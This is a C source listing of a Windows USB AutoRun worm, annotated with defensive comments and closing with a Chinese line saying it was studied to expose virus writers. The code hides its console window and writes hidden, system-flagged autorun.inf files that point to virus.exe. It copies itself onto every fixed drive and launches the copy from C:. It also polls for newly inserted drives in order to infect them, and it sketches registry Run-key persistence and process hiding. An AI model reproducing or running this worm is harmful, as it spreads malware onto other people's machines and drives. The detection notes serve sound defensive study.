// Linker options: select the Windows (GUI) subsystem and name mainCRTStartup
// as the entry point, so that no console window appears when the program runs.
// NOTE(review): the quoting inside the string literals of this listing looks
// damaged by page extraction; the text is kept exactly as found.
#pragma comment( linker, "/subsystem:/"windows/" /entry:/"mainCRTStartup/"" )
// Text that main() writes into autorun.inf at a drive root: an [autorun]
// section whose open= entry names virus.exe.
// Defensive relevance: an autorun.inf at a volume root whose open= line points
// at an executable stored beside it is the artifact to look for.
#define AUTORUN_INF "[autorun]/r/nopen=virus.exe/r/n"
// Listing of a removable-drive ("USB") AutoRun worm, kept here for defensive study.
//
// Flow visible in this function:
//   1. Read the logical-drive bitmask and the root of the drive the program
//      itself was started from.
//   2. If that root is a removable drive: write autorun.inf and a copy of
//      virus.exe to every fixed drive, then start the copy on C:.
//   3. Otherwise: poll the drive bitmask in an endless loop and write the same
//      two files to a drive that newly appears.
//
// Detection notes: the file-system footprint is an autorun.inf created at a
// volume root with the hidden, system and read-only attributes set, together
// with an executable copied next to it. The second branch polls every 10 ms.
// Mitigation note: disabling AutoRun for all drive types (the
// NoDriveTypeAutoRun policy) removes the trigger that autorun.inf relies on;
// verify the effective setting per Windows version.
//
// Returns 0 after the removable-drive branch; the other branch never returns.
int main(){
int disk,olddisk,i;
UINT Type;
char buf[MAX_PATH];
char filename[MAX_PATH];
DWORD dwWritenSize = 0;
// Bitmask of the logical drives currently present (bit 0 = A:, bit 1 = B:, ...).
disk = olddisk = GetLogicalDrives();
// Full path of the running executable, cut after three characters so that
// only the drive root of the launch location remains in buf.
HMODULE module= GetModuleHandle(0);
GetModuleFileName(module,buf,sizeof(buf));
buf[3]=0;
printf("%s/n",buf);
// Branch 1: the program was launched from a removable drive.
if(GetDriveType(buf)==DRIVE_REMOVABLE){
// Walk all 32 bits of the drive mask, one drive letter per bit.
for (i=0;i<32;i++)
{
if(disk&1){
sprintf(buf,"%c://",'A'+i);
Type = GetDriveType(buf);
// Get the drive type
if(Type==DRIVE_FIXED){
// Create or overwrite (CREATE_ALWAYS) autorun.inf at the root of the fixed
// drive, marked hidden + read-only + system and opened write-through.
sprintf(filename,"%c://autorun.inf",'A'+i);
HANDLE hFile = CreateFile(filename,GENERIC_WRITE
,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN
|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM
|FILE_FLAG_WRITE_THROUGH,NULL);
WriteFile(hFile,AUTORUN_INF,sizeof(AUTORUN_INF),
&dwWritenSize,NULL);
CloseHandle(hFile);
// Copy virus.exe (source given as a relative path) to the same drive root;
// FALSE lets an existing file be overwritten.
sprintf(filename,"%c://virus.exe",'A'+i);
CopyFile("virus.exe",filename,FALSE);
}
}
// Move the next drive's bit into position 0.
disk>>=1;
}
// Add an autostart entry to the registry; fairly dangerous, debugging it is not recommended
//RegOpenKey(HKEY_LOCAL_MACHINE,"Software//Microsoft//Windows//CurrentVersion//Run",&RegKey);
// Add here whatever you need to register in the registry
//RegSetValueEx(RegKey,"getip",0,REG_SZ,(const unsigned char*)(LPCTSTR)fullName,fullName.GetLength());
// Then call the remote-thread injection function CreateRemoteThread to hide the process in the process manager
// To keep this program from being used maliciously, I do not explain that part here and replace it with an ellipsis
//......
// Defensive note: the registry calls above are disabled in this listing, but
// the Run key they name is a standard persistence location worth auditing.
// Start the copy placed on C: as a new process at normal priority.
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si,sizeof(si));
si.cb = sizeof(si);
CreateProcess(NULL,"c://virus.exe",NULL,NULL,FALSE
,NORMAL_PRIORITY_CLASS,NULL,NULL,&si,&pi);
}
// Branch 2: launched from a non-removable drive; watch for new drives.
else{
while (true)
{
// Re-read the drive mask; the branch below runs when its numeric value is
// larger than the remembered one.
disk = GetLogicalDrives();
if(disk>olddisk){
// Keep only the difference, then count right shifts until the value reaches
// zero; i ends up as the index of the highest bit that was set.
disk-=olddisk;
i=0;
while(disk>>=1)i++;
// Same two-file drop as in branch 1, aimed at the drive letter derived above.
sprintf(filename,"%c://autorun.inf",'A'+i);
HANDLE hFile = CreateFile(filename,GENERIC_WRITE
,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN
|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM
|FILE_FLAG_WRITE_THROUGH,NULL);
WriteFile(hFile,AUTORUN_INF,sizeof(AUTORUN_INF),
&dwWritenSize,NULL);
CloseHandle(hFile);
sprintf(filename,"%c://virus.exe",'A'+i);
CopyFile("virus.exe",filename,FALSE);
}
// olddisk takes the value disk holds at this point, which is the value left
// by the subtraction and shifts above whenever the branch ran.
olddisk = disk;
// 10 ms pause between polls.
Sleep(10);
}
}
return 0;
}
为了揭露病毒制作者的丑恶行径,决定研究U盘病毒的结构,以更好地防毒。